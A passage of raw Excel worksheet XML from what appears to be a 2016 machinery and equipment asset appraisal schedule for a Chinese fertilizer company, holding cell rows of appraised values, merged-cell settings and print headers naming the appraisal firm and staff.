      <c r="L428" s="238" t="s">
        <v>1290</v>
      </c>
      <c r="M428" s="225"/>
    </row>
    <row r="429" ht="14.25" customHeight="1" spans="2:13">
      <c r="B429" s="11">
        <v>409</v>
      </c>
      <c r="C429" s="11"/>
      <c r="D429" s="238" t="s">
        <v>1287</v>
      </c>
      <c r="E429" s="238" t="s">
        <v>1281</v>
      </c>
      <c r="F429" s="9" t="s">
        <v>1289</v>
      </c>
      <c r="G429" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H429" s="11">
        <v>2</v>
      </c>
      <c r="I429" s="11"/>
      <c r="J429" s="91"/>
      <c r="K429" s="99">
        <v>29120</v>
      </c>
      <c r="L429" s="238" t="s">
        <v>1283</v>
      </c>
      <c r="M429" s="225"/>
    </row>
    <row r="430" ht="14.25" customHeight="1" spans="2:13">
      <c r="B430" s="11">
        <v>410</v>
      </c>
      <c r="C430" s="11"/>
      <c r="D430" s="10" t="s">
        <v>1293</v>
      </c>
      <c r="E430" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="F430" s="9"/>
      <c r="G430" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H430" s="11">
        <v>3</v>
      </c>
      <c r="I430" s="11"/>
      <c r="J430" s="91"/>
      <c r="K430" s="99">
        <v>12480</v>
      </c>
      <c r="L430" s="10"/>
      <c r="M430" s="225"/>
    </row>
    <row r="431" ht="14.25" customHeight="1" spans="2:13">
      <c r="B431" s="226" t="s">
        <v>1294</v>
      </c>
      <c r="C431" s="227"/>
      <c r="D431" s="228"/>
      <c r="E431" s="10"/>
      <c r="F431" s="14"/>
      <c r="G431" s="11"/>
      <c r="H431" s="11"/>
      <c r="I431" s="11"/>
      <c r="J431" s="91"/>
      <c r="K431" s="99">
        <v>0</v>
      </c>
      <c r="L431" s="10"/>
      <c r="M431" s="225"/>
    </row>
    <row r="432" ht="14.25" customHeight="1" spans="2:13">
      <c r="B432" s="11">
        <v>411</v>
      </c>
      <c r="C432" s="237" t="s">
        <v>1295</v>
      </c>
      <c r="D432" s="238" t="s">
        <v>334</v>
      </c>
      <c r="E432" s="238" t="s">
        <v>1288</v>
      </c>
      <c r="F432" s="14"/>
      <c r="G432" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H432" s="11">
        <v>1</v>
      </c>
      <c r="I432" s="237" t="s">
        <v>266</v>
      </c>
      <c r="J432" s="91">
        <v>32000</v>
      </c>
      <c r="K432" s="99">
        <v>4600</v>
      </c>
      <c r="L432" s="238" t="s">
        <v>1296</v>
      </c>
      <c r="M432" s="225"/>
    </row>
    <row r="433" ht="14.25" customHeight="1" spans="2:13">
      <c r="B433" s="11">
        <v>412</v>
      </c>
      <c r="C433" s="237" t="s">
        <v>1297</v>
      </c>
      <c r="D433" s="238" t="s">
        <v>1293</v>
      </c>
      <c r="E433" s="238" t="s">
        <v>1298</v>
      </c>
      <c r="F433" s="14"/>
      <c r="G433" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H433" s="11">
        <v>1</v>
      </c>
      <c r="I433" s="237" t="s">
        <v>1079</v>
      </c>
      <c r="J433" s="91">
        <v>23000</v>
      </c>
      <c r="K433" s="99">
        <v>3680</v>
      </c>
      <c r="L433" s="238" t="s">
        <v>1296</v>
      </c>
      <c r="M433" s="225"/>
    </row>
    <row r="434" ht="14.25" customHeight="1" spans="2:13">
      <c r="B434" s="11">
        <v>413</v>
      </c>
      <c r="C434" s="237" t="s">
        <v>1299</v>
      </c>
      <c r="D434" s="238" t="s">
        <v>1300</v>
      </c>
      <c r="E434" s="238" t="s">
        <v>1301</v>
      </c>
      <c r="F434" s="14"/>
      <c r="G434" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H434" s="11">
        <v>1</v>
      </c>
      <c r="I434" s="237" t="s">
        <v>1079</v>
      </c>
      <c r="J434" s="91">
        <v>8800</v>
      </c>
      <c r="K434" s="99">
        <v>1472</v>
      </c>
      <c r="L434" s="238" t="s">
        <v>1296</v>
      </c>
      <c r="M434" s="225"/>
    </row>
    <row r="435" ht="14.25" customHeight="1" spans="2:13">
      <c r="B435" s="11">
        <v>414</v>
      </c>
      <c r="C435" s="237" t="s">
        <v>1302</v>
      </c>
      <c r="D435" s="238" t="s">
        <v>1303</v>
      </c>
      <c r="E435" s="238" t="s">
        <v>1304</v>
      </c>
      <c r="F435" s="14"/>
      <c r="G435" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H435" s="11">
        <v>1</v>
      </c>
      <c r="I435" s="237" t="s">
        <v>1079</v>
      </c>
      <c r="J435" s="91">
        <v>56200</v>
      </c>
      <c r="K435" s="99">
        <v>9200</v>
      </c>
      <c r="L435" s="238" t="s">
        <v>1296</v>
      </c>
      <c r="M435" s="225"/>
    </row>
    <row r="436" ht="14.25" customHeight="1" spans="2:13">
      <c r="B436" s="11">
        <v>415</v>
      </c>
      <c r="C436" s="237" t="s">
        <v>1305</v>
      </c>
      <c r="D436" s="238" t="s">
        <v>1306</v>
      </c>
      <c r="E436" s="238" t="s">
        <v>1307</v>
      </c>
      <c r="F436" s="9" t="s">
        <v>1308</v>
      </c>
      <c r="G436" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H436" s="11">
        <v>1</v>
      </c>
      <c r="I436" s="237" t="s">
        <v>1309</v>
      </c>
      <c r="J436" s="91">
        <v>2510000</v>
      </c>
      <c r="K436" s="99">
        <v>595200</v>
      </c>
      <c r="L436" s="238" t="s">
        <v>1296</v>
      </c>
      <c r="M436" s="225"/>
    </row>
    <row r="437" ht="14.25" customHeight="1" spans="2:13">
      <c r="B437" s="11">
        <v>416</v>
      </c>
      <c r="C437" s="11"/>
      <c r="D437" s="10" t="s">
        <v>1310</v>
      </c>
      <c r="E437" s="10" t="s">
        <v>1311</v>
      </c>
      <c r="F437" s="9" t="s">
        <v>800</v>
      </c>
      <c r="G437" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H437" s="11">
        <v>2</v>
      </c>
      <c r="I437" s="11">
        <v>2008</v>
      </c>
      <c r="J437" s="91"/>
      <c r="K437" s="99">
        <v>49600</v>
      </c>
      <c r="L437" s="238" t="s">
        <v>1296</v>
      </c>
      <c r="M437" s="225"/>
    </row>
    <row r="438" ht="14.25" customHeight="1" spans="2:13">
      <c r="B438" s="11">
        <v>417</v>
      </c>
      <c r="C438" s="11"/>
      <c r="D438" s="10" t="s">
        <v>1310</v>
      </c>
      <c r="E438" s="238" t="s">
        <v>1311</v>
      </c>
      <c r="F438" s="9" t="s">
        <v>800</v>
      </c>
      <c r="G438" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H438" s="11">
        <v>2</v>
      </c>
      <c r="I438" s="11">
        <v>2008</v>
      </c>
      <c r="J438" s="91"/>
      <c r="K438" s="99">
        <v>49600</v>
      </c>
      <c r="L438" s="238" t="s">
        <v>1296</v>
      </c>
      <c r="M438" s="225"/>
    </row>
    <row r="439" ht="14.25" customHeight="1" spans="2:13">
      <c r="B439" s="11">
        <v>418</v>
      </c>
      <c r="C439" s="237" t="s">
        <v>1312</v>
      </c>
      <c r="D439" s="238" t="s">
        <v>1313</v>
      </c>
      <c r="E439" s="238" t="s">
        <v>1314</v>
      </c>
      <c r="F439" s="14"/>
      <c r="G439" s="11" t="s">
        <v>1315</v>
      </c>
      <c r="H439" s="11">
        <v>1</v>
      </c>
      <c r="I439" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J439" s="91">
        <v>80000</v>
      </c>
      <c r="K439" s="99">
        <v>12000</v>
      </c>
      <c r="L439" s="238" t="s">
        <v>1316</v>
      </c>
      <c r="M439" s="225"/>
    </row>
    <row r="440" ht="14.25" customHeight="1" spans="2:13">
      <c r="B440" s="11">
        <v>419</v>
      </c>
      <c r="C440" s="237" t="s">
        <v>1317</v>
      </c>
      <c r="D440" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E440" s="238" t="s">
        <v>1318</v>
      </c>
      <c r="F440" s="14"/>
      <c r="G440" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H440" s="11">
        <v>1</v>
      </c>
      <c r="I440" s="237" t="s">
        <v>326</v>
      </c>
      <c r="J440" s="91">
        <v>5726</v>
      </c>
      <c r="K440" s="99">
        <v>1030.4</v>
      </c>
      <c r="L440" s="10"/>
      <c r="M440" s="225"/>
    </row>
    <row r="441" ht="14.25" customHeight="1" spans="2:13">
      <c r="B441" s="11">
        <v>420</v>
      </c>
      <c r="C441" s="237" t="s">
        <v>1319</v>
      </c>
      <c r="D441" s="238" t="s">
        <v>1320</v>
      </c>
      <c r="E441" s="238" t="s">
        <v>1321</v>
      </c>
      <c r="F441" s="14"/>
      <c r="G441" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H441" s="11">
        <v>1</v>
      </c>
      <c r="I441" s="237" t="s">
        <v>1322</v>
      </c>
      <c r="J441" s="91">
        <v>14076.92</v>
      </c>
      <c r="K441" s="99">
        <v>19040</v>
      </c>
      <c r="L441" s="10"/>
      <c r="M441" s="225"/>
    </row>
    <row r="442" ht="14.25" customHeight="1" spans="2:13">
      <c r="B442" s="11">
        <v>421</v>
      </c>
      <c r="C442" s="237" t="s">
        <v>1323</v>
      </c>
      <c r="D442" s="238" t="s">
        <v>1324</v>
      </c>
      <c r="E442" s="238" t="s">
        <v>1325</v>
      </c>
      <c r="F442" s="14"/>
      <c r="G442" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H442" s="11">
        <v>1</v>
      </c>
      <c r="I442" s="237" t="s">
        <v>432</v>
      </c>
      <c r="J442" s="91">
        <v>4102.56</v>
      </c>
      <c r="K442" s="99">
        <v>1440</v>
      </c>
      <c r="L442" s="10"/>
      <c r="M442" s="225"/>
    </row>
    <row r="443" ht="14.25" customHeight="1" spans="2:13">
      <c r="B443" s="11">
        <v>422</v>
      </c>
      <c r="C443" s="237" t="s">
        <v>1326</v>
      </c>
      <c r="D443" s="238" t="s">
        <v>1327</v>
      </c>
      <c r="E443" s="9"/>
      <c r="F443" s="17"/>
      <c r="G443" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H443" s="11">
        <v>2</v>
      </c>
      <c r="I443" s="237" t="s">
        <v>1013</v>
      </c>
      <c r="J443" s="100">
        <v>125000</v>
      </c>
      <c r="K443" s="99">
        <v>0</v>
      </c>
      <c r="L443" s="239" t="s">
        <v>1328</v>
      </c>
      <c r="M443" s="225"/>
    </row>
    <row r="444" ht="14.25" customHeight="1" spans="2:13">
      <c r="B444" s="11">
        <v>423</v>
      </c>
      <c r="C444" s="237" t="s">
        <v>1329</v>
      </c>
      <c r="D444" s="238" t="s">
        <v>1330</v>
      </c>
      <c r="E444" s="9"/>
      <c r="F444" s="17"/>
      <c r="G444" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H444" s="11">
        <v>2</v>
      </c>
      <c r="I444" s="237" t="s">
        <v>1331</v>
      </c>
      <c r="J444" s="100">
        <v>180341.88</v>
      </c>
      <c r="K444" s="99">
        <v>0</v>
      </c>
      <c r="L444" s="239" t="s">
        <v>1332</v>
      </c>
      <c r="M444" s="225"/>
    </row>
    <row r="445" ht="14.25" customHeight="1" spans="2:13">
      <c r="B445" s="11">
        <v>424</v>
      </c>
      <c r="C445" s="237" t="s">
        <v>1333</v>
      </c>
      <c r="D445" s="238" t="s">
        <v>701</v>
      </c>
      <c r="E445" s="237" t="s">
        <v>1334</v>
      </c>
      <c r="F445" s="17"/>
      <c r="G445" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H445" s="11">
        <v>1</v>
      </c>
      <c r="I445" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J445" s="100">
        <v>133000</v>
      </c>
      <c r="K445" s="99">
        <v>0</v>
      </c>
      <c r="L445" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M445" s="225"/>
    </row>
    <row r="446" ht="14.25" customHeight="1" spans="2:13">
      <c r="B446" s="11">
        <v>425</v>
      </c>
      <c r="C446" s="237" t="s">
        <v>1336</v>
      </c>
      <c r="D446" s="238" t="s">
        <v>1337</v>
      </c>
      <c r="E446" s="237" t="s">
        <v>1338</v>
      </c>
      <c r="F446" s="17"/>
      <c r="G446" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H446" s="11">
        <v>2</v>
      </c>
      <c r="I446" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J446" s="100">
        <v>800000</v>
      </c>
      <c r="K446" s="99">
        <v>0</v>
      </c>
      <c r="L446" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M446" s="225"/>
    </row>
    <row r="447" ht="14.25" customHeight="1" spans="2:13">
      <c r="B447" s="11">
        <v>426</v>
      </c>
      <c r="C447" s="237" t="s">
        <v>1339</v>
      </c>
      <c r="D447" s="238" t="s">
        <v>1340</v>
      </c>
      <c r="E447" s="237" t="s">
        <v>1341</v>
      </c>
      <c r="F447" s="17"/>
      <c r="G447" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H447" s="11">
        <v>1</v>
      </c>
      <c r="I447" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J447" s="100">
        <v>33000</v>
      </c>
      <c r="K447" s="99">
        <v>0</v>
      </c>
      <c r="L447" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M447" s="225"/>
    </row>
    <row r="448" ht="14.25" customHeight="1" spans="2:13">
      <c r="B448" s="11">
        <v>427</v>
      </c>
      <c r="C448" s="237" t="s">
        <v>1342</v>
      </c>
      <c r="D448" s="238" t="s">
        <v>1343</v>
      </c>
      <c r="E448" s="11"/>
      <c r="F448" s="17"/>
      <c r="G448" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H448" s="11">
        <v>1</v>
      </c>
      <c r="I448" s="237" t="s">
        <v>965</v>
      </c>
      <c r="J448" s="100">
        <v>15000</v>
      </c>
      <c r="K448" s="99">
        <v>0</v>
      </c>
      <c r="L448" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M448" s="225"/>
    </row>
    <row r="449" ht="14.25" customHeight="1" spans="2:13">
      <c r="B449" s="11">
        <v>428</v>
      </c>
      <c r="C449" s="237" t="s">
        <v>1344</v>
      </c>
      <c r="D449" s="238" t="s">
        <v>331</v>
      </c>
      <c r="E449" s="237" t="s">
        <v>967</v>
      </c>
      <c r="F449" s="17"/>
      <c r="G449" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H449" s="11">
        <v>2</v>
      </c>
      <c r="I449" s="237" t="s">
        <v>968</v>
      </c>
      <c r="J449" s="100">
        <v>45264.58</v>
      </c>
      <c r="K449" s="99">
        <v>0</v>
      </c>
      <c r="L449" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M449" s="225"/>
    </row>
    <row r="450" ht="14.25" customHeight="1" spans="2:13">
      <c r="B450" s="11">
        <v>429</v>
      </c>
      <c r="C450" s="237" t="s">
        <v>1345</v>
      </c>
      <c r="D450" s="238" t="s">
        <v>1346</v>
      </c>
      <c r="E450" s="11"/>
      <c r="F450" s="17"/>
      <c r="G450" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H450" s="11">
        <v>2</v>
      </c>
      <c r="I450" s="237" t="s">
        <v>1000</v>
      </c>
      <c r="J450" s="100">
        <v>32480</v>
      </c>
      <c r="K450" s="99">
        <v>0</v>
      </c>
      <c r="L450" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M450" s="225"/>
    </row>
    <row r="451" ht="14.25" customHeight="1" spans="2:13">
      <c r="B451" s="11">
        <v>430</v>
      </c>
      <c r="C451" s="237" t="s">
        <v>1347</v>
      </c>
      <c r="D451" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E451" s="237" t="s">
        <v>1349</v>
      </c>
      <c r="F451" s="17"/>
      <c r="G451" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H451" s="11">
        <v>1</v>
      </c>
      <c r="I451" s="237" t="s">
        <v>1000</v>
      </c>
      <c r="J451" s="100">
        <v>6280</v>
      </c>
      <c r="K451" s="99">
        <v>0</v>
      </c>
      <c r="L451" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M451" s="225"/>
    </row>
    <row r="452" ht="14.25" customHeight="1" spans="2:13">
      <c r="B452" s="11">
        <v>431</v>
      </c>
      <c r="C452" s="237" t="s">
        <v>1350</v>
      </c>
      <c r="D452" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E452" s="237" t="s">
        <v>1351</v>
      </c>
      <c r="F452" s="17"/>
      <c r="G452" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H452" s="11">
        <v>2</v>
      </c>
      <c r="I452" s="237" t="s">
        <v>1000</v>
      </c>
      <c r="J452" s="100">
        <v>15200</v>
      </c>
      <c r="K452" s="99">
        <v>0</v>
      </c>
      <c r="L452" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M452" s="225"/>
    </row>
    <row r="453" ht="14.25" customHeight="1" spans="2:13">
      <c r="B453" s="11">
        <v>432</v>
      </c>
      <c r="C453" s="237" t="s">
        <v>1352</v>
      </c>
      <c r="D453" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E453" s="237" t="s">
        <v>1353</v>
      </c>
      <c r="F453" s="17"/>
      <c r="G453" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H453" s="11">
        <v>1</v>
      </c>
      <c r="I453" s="237" t="s">
        <v>1000</v>
      </c>
      <c r="J453" s="100">
        <v>7440</v>
      </c>
      <c r="K453" s="99">
        <v>0</v>
      </c>
      <c r="L453" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M453" s="225"/>
    </row>
    <row r="454" ht="14.25" customHeight="1" spans="2:13">
      <c r="B454" s="11">
        <v>433</v>
      </c>
      <c r="C454" s="237" t="s">
        <v>1354</v>
      </c>
      <c r="D454" s="238" t="s">
        <v>1348</v>
      </c>
      <c r="E454" s="237" t="s">
        <v>1349</v>
      </c>
      <c r="F454" s="17"/>
      <c r="G454" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H454" s="11">
        <v>1</v>
      </c>
      <c r="I454" s="237" t="s">
        <v>1000</v>
      </c>
      <c r="J454" s="100">
        <v>10600</v>
      </c>
      <c r="K454" s="99">
        <v>0</v>
      </c>
      <c r="L454" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M454" s="225"/>
    </row>
    <row r="455" ht="14.25" customHeight="1" spans="2:13">
      <c r="B455" s="11">
        <v>434</v>
      </c>
      <c r="C455" s="237" t="s">
        <v>1355</v>
      </c>
      <c r="D455" s="238" t="s">
        <v>1356</v>
      </c>
      <c r="E455" s="237" t="s">
        <v>1357</v>
      </c>
      <c r="F455" s="17"/>
      <c r="G455" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H455" s="11">
        <v>2</v>
      </c>
      <c r="I455" s="237" t="s">
        <v>1171</v>
      </c>
      <c r="J455" s="100">
        <v>78000</v>
      </c>
      <c r="K455" s="99">
        <v>0</v>
      </c>
      <c r="L455" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M455" s="225"/>
    </row>
    <row r="456" ht="14.25" customHeight="1" spans="2:13">
      <c r="B456" s="11">
        <v>435</v>
      </c>
      <c r="C456" s="237" t="s">
        <v>1358</v>
      </c>
      <c r="D456" s="238" t="s">
        <v>1359</v>
      </c>
      <c r="E456" s="11"/>
      <c r="F456" s="17"/>
      <c r="G456" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H456" s="11">
        <v>1</v>
      </c>
      <c r="I456" s="237" t="s">
        <v>995</v>
      </c>
      <c r="J456" s="100">
        <v>3974.36</v>
      </c>
      <c r="K456" s="99">
        <v>0</v>
      </c>
      <c r="L456" s="242" t="s">
        <v>1335</v>
      </c>
      <c r="M456" s="225"/>
    </row>
    <row r="457" ht="14.25" customHeight="1" spans="2:13">
      <c r="B457" s="206" t="s">
        <v>1360</v>
      </c>
      <c r="C457" s="207"/>
      <c r="D457" s="207"/>
      <c r="E457" s="208"/>
      <c r="F457" s="17"/>
      <c r="G457" s="16"/>
      <c r="H457" s="231">
        <v>805</v>
      </c>
      <c r="I457" s="114"/>
      <c r="J457" s="91">
        <v>116029944.89</v>
      </c>
      <c r="K457" s="99">
        <v>21542685.092</v>
      </c>
      <c r="L457" s="17"/>
      <c r="M457" s="225"/>
    </row>
    <row r="458" customHeight="1" spans="10:10">
      <c r="J458" s="116"/>
    </row>
  </sheetData>
  <mergeCells count="29">
    <mergeCell ref="B1:K1"/>
    <mergeCell ref="B3:C3"/>
    <mergeCell ref="D3:L3"/>
    <mergeCell ref="B7:D7"/>
    <mergeCell ref="B103:D103"/>
    <mergeCell ref="B209:D209"/>
    <mergeCell ref="B237:D237"/>
    <mergeCell ref="B263:D263"/>
    <mergeCell ref="B289:D289"/>
    <mergeCell ref="B318:D318"/>
    <mergeCell ref="B325:D325"/>
    <mergeCell ref="B343:D343"/>
    <mergeCell ref="B362:D362"/>
    <mergeCell ref="B379:D379"/>
    <mergeCell ref="B398:D398"/>
    <mergeCell ref="B424:D424"/>
    <mergeCell ref="B431:D431"/>
    <mergeCell ref="B457:E457"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="E5:E6"/>
    <mergeCell ref="F5:F6"/>
    <mergeCell ref="G5:G6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I5:I6"/>
    <mergeCell ref="J5:J6"/>
    <mergeCell ref="K5:K6"/>
    <mergeCell ref="L5:L6"/>
  </mergeCells>
  <printOptions horizontalCentered="1" verticalCentered="1"/>
  <pageMargins left="0" right="0" top="0.236111111111111" bottom="0" header="0.944444444444444" footer="0.550694444444444"/>
  <pageSetup paperSize="9" scale="75" orientation="portrait" horizontalDpi="600"/>
  <headerFooter alignWithMargins="0" scaleWithDoc="0">
    <oddHeader>&amp;L&amp;10
被评估单位（或者产权持有单位）：晋煤冀州银海化肥有限责任公司&amp;C&amp;"黑体,常规"&amp;18固定资产—机器设备评估明细表&amp;"宋体,常规"&amp;12
&amp;10评估基准日：2016年10月31日&amp;R&amp;10
表4-6-4
金额单位：人民币元</oddHeader>
    <oddFooter>&amp;L&amp;10评估单位:衡水正财资产评估有限公司&amp;C&amp;10评估人员：于红兵 郑国建 吴洁 贾佳 王文祥 程艳菊</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264"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B1" sqref="B1:K1"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="23.25" customHeight="1"/>
  <cols>
    <col min="1" max="1" width="9" style="176"/>
    <col min="2" max="2" width="5.375" style="177" customWidth="1"/>
    <col min="3" max="3" width="9" style="177" customWidth="1"/>
    <col min="4" max="4" width="24" style="203" customWidth="1"/>
    <col min="5" max="5" width="17.875" style="203" customWidth="1"/>
    <col min="6" max="6" width="16.375" style="177" customWidth="1"/>
    <col min="7" max="7" width="5" style="177" customWidth="1"/>
    <col min="8" max="8" width="5.125" style="177" customWidth="1"/>
    <col min="9" max="9" width="12.625" style="177" customWidth="1"/>
    <col min="10" max="10" width="12.5" style="204" customWidth="1"/>
    <col min="11" max="11" width="13.875" style="176" customWidth="1"/>
    <col min="12" max="12" width="26.75" style="176" customWidth="1"/>
    <col min="13" max="16384" width="9" style="176"/>
  </cols>
  <sheetData>
    <row r="1" customHeight="1" spans="2:12">
      <c r="B1" s="3" t="s">
        <v>206</v>
      </c>
      <c r="C1" s="3"/>
      <c r="D1" s="3"/>
      <c r="E1" s="3"/>
      <c r="F1" s="3"/>
      <c r="G1" s="3"/>
      <c r="H1" s="3"/>
      <c r="I1" s="3"/>
      <c r="J1" s="3"/>
      <c r="K1" s="3"/>
      <c r="L1" s="1"/>
    </row>
    <row r="2" customHeight="1" spans="2:12">
      <c r="B2" s="1"/>
      <c r="C2" s="2"/>
      <c r="D2" s="2"/>
      <c r="E2" s="2"/>
      <c r="F2" s="2"/>
      <c r="G2" s="1"/>
      <c r="H2" s="1"/>
      <c r="I2" s="1"/>
      <c r="J2" s="1"/>
      <c r="K2" s="1"/>
      <c r="L2" s="1"/>
    </row>
    <row r="3" customHeight="1" spans="2:12">
      <c r="B3" s="4" t="s">
        <v>207</v>
      </c>
      <c r="C3" s="4"/>
      <c r="D3" s="5" t="s">
        <v>1361</v>
      </c>
      <c r="E3" s="5"/>
      <c r="F3" s="5"/>
      <c r="G3" s="5"/>
      <c r="H3" s="5"/>
      <c r="I3" s="5"/>
      <c r="J3" s="5"/>
      <c r="K3" s="5"/>
      <c r="L3" s="5"/>
    </row>
    <row r="5" customHeight="1" spans="2:12">
      <c r="B5" s="8" t="s">
        <v>209</v>
      </c>
      <c r="C5" s="8" t="s">
        <v>210</v>
      </c>
      <c r="D5" s="6" t="s">
        <v>211</v>
      </c>
      <c r="E5" s="6" t="s">
        <v>212</v>
      </c>
      <c r="F5" s="6" t="s">
        <v>213</v>
      </c>
      <c r="G5" s="8" t="s">
        <v>214</v>
      </c>
      <c r="H5" s="8" t="s">
        <v>215</v>
      </c>
      <c r="I5" s="184" t="s">
        <v>1362</v>
      </c>
      <c r="J5" s="184" t="s">
        <v>217</v>
      </c>
      <c r="K5" s="8" t="s">
        <v>218</v>
      </c>
      <c r="L5" s="185" t="s">
        <v>219</v>
      </c>
    </row>
    <row r="6" customHeight="1" spans="2:12">
      <c r="B6" s="8"/>
      <c r="C6" s="8"/>
      <c r="D6" s="6"/>
      <c r="E6" s="6"/>
      <c r="F6" s="6"/>
      <c r="G6" s="8"/>
      <c r="H6" s="8"/>
      <c r="I6" s="186"/>
      <c r="J6" s="186"/>
      <c r="K6" s="8"/>
      <c r="L6" s="185"/>
    </row>
    <row r="7" customHeight="1" spans="2:12">
      <c r="B7" s="16">
        <v>1</v>
      </c>
      <c r="C7" s="237" t="s">
        <v>1363</v>
      </c>
      <c r="D7" s="238" t="s">
        <v>1364</v>
      </c>
      <c r="E7" s="238" t="s">
        <v>1365</v>
      </c>
      <c r="F7" s="11" t="s">
        <v>1159</v>
      </c>
      <c r="G7" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H7" s="11">
        <v>2</v>
      </c>
      <c r="I7" s="11">
        <v>1991</v>
      </c>
      <c r="J7" s="126">
        <v>12000</v>
      </c>
      <c r="K7" s="188">
        <v>448</v>
      </c>
      <c r="L7" s="238" t="s">
        <v>1366</v>
      </c>
    </row>
    <row r="8" customHeight="1" spans="2:12">
      <c r="B8" s="16">
        <v>2</v>
      </c>
      <c r="C8" s="237" t="s">
        <v>1367</v>
      </c>
      <c r="D8" s="238" t="s">
        <v>1368</v>
      </c>
      <c r="E8" s="10"/>
      <c r="F8" s="11" t="s">
        <v>1369</v>
      </c>
      <c r="G8" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H8" s="11">
        <v>1</v>
      </c>
      <c r="I8" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J8" s="126">
        <v>17597</v>
      </c>
      <c r="K8" s="188">
        <v>3808</v>
      </c>
      <c r="L8" s="238" t="s">
        <v>1370</v>
      </c>
    </row>
    <row r="9" customHeight="1" spans="2:12">
      <c r="B9" s="16">
        <v>3</v>
      </c>
      <c r="C9" s="237" t="s">
        <v>1371</v>
      </c>
      <c r="D9" s="238" t="s">
        <v>1372</v>
      </c>
      <c r="E9" s="10"/>
      <c r="F9" s="11"/>
      <c r="G9" s="16" t="s">
        <v>507</v>
      </c>
      <c r="H9" s="11">
        <v>3</v>
      </c>
      <c r="I9" s="237" t="s">
        <v>322</v>
      </c>
      <c r="J9" s="126">
        <v>6000</v>
      </c>
      <c r="K9" s="188">
        <v>1344</v>
      </c>
      <c r="L9" s="238" t="s">
        <v>1370</v>
      </c>
    </row>
    <row r="10" customHeight="1" spans="2:12">
      <c r="B10" s="16">
        <v>4</v>
      </c>
      <c r="C10" s="237" t="s">
        <v>1373</v>
      </c>
      <c r="D10" s="238" t="s">
        <v>1374</v>
      </c>
      <c r="E10" s="238" t="s">
        <v>1375</v>
      </c>
      <c r="F10" s="11"/>
      <c r="G10" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H10" s="11">
        <v>1</v>
      </c>
      <c r="I10" s="237" t="s">
        <v>1376</v>
      </c>
      <c r="J10" s="126">
        <v>25000</v>
      </c>
      <c r="K10" s="188">
        <v>6400</v>
      </c>
      <c r="L10" s="238" t="s">
        <v>1370</v>
      </c>
    </row>
    <row r="11" customHeight="1" spans="2:12">
      <c r="B11" s="16">
        <v>5</v>
      </c>
      <c r="C11" s="237" t="s">
        <v>1377</v>
      </c>
      <c r="D11" s="238" t="s">
        <v>1378</v>
      </c>
      <c r="E11" s="238" t="s">
        <v>1379</v>
      </c>
      <c r="F11" s="11"/>
      <c r="G11" s="16" t="s">
        <v>466</v>
      </c>
      <c r="H11" s="11">
        <v>1</v>
      </c>
      <c r="I11" s="237" t="s">
        <v>1376</v>
      </c>
      <c r="J11" s="126">
        <v>31800</v>
      </c>
      <c r="K11" s="188">
        <v>8140.8</v>
      </c>
      <c r="L11" s="238" t="s">
        <v>1380</v>
      </c>
    </row>
    <row r="12" customHeight="1" spans="2:12">
      <c r="B12" s="16">
        <v>6</v>
      </c>
      <c r="C12" s="237" t="s">
        <v>1381</v>
      </c>
      <c r="D12" s="238" t="s">
        <v>1374</v>
      </c>
      <c r="E12" s="238" t="s">
        <v>1382</v>
      </c>
      <c r="F12" s="11"/>
      <c r="G12" s="16" t="s">
        <v>223</v>
      </c>
      <c r="H12" s="11">
        <v>1</v>
      </c>
      <c r="I12" s="237" t="s">
        <v>958</v>
      </c>
      <c r="J12" s="126">
        <v>30000</v>
      </c>
      <c r="K12" s="188">
        <v>4800</v>
      </c>
      <c r="L12" s="238" t="s">
        <v>1383</v>
      </c>
    </row>
    <row r="13" customHeight="1" spans="2:12">
      <c r="B13" s="16">
        <v>7</v>
      </c>
      <c r="C13" s="237" t="s">
